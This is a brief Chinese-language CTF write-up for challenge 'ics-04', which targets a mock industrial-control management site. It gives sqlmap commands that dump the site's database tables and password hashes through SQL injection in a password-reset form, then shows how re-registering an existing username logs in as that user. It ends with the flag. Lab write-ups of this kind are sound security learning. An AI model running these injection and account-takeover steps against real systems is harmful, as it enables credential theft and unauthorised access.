CTF ics-04
2020-10-06 15:00:31
難度係數: ★★★★
題目來源: XCTF 4th-CyberEarth
題目描述: 工控雲管理系統新新增的登入和註冊頁面存在漏洞,請找出flag。
題目場景: http://220.249.52.133:52962(溫馨提示:每次進入URL的埠號都不一樣)
1、點選連結進入如下介面
2、先註冊幾個賬號,相同的使用者名稱
3、登入—>忘記密碼
4、忘記密碼
5、在kail Linux 裡,開始sql注入
執行如下:
5.1
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" ‐dbs
5.2
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 - -tables
5.3
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 -T user - -columns
5.4
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 -T user -C "username,password" - -dump
5.5 OK
有一個沒註冊過的使用者名稱:c3tlwDmIn23
其密碼經過 md5 加密處理過,但這個使用者的密碼沒有被解析出來。
6、看到有兩個使用者名稱為 yibodong,並且題目描述中說了註冊頁面有漏洞,再重複註冊一個 c3tlwDmIn23 使用者
7、登入—>flag就出來了
8、OK
cyberpeace{f3f54fb8f17053c68a7672794dae7e98}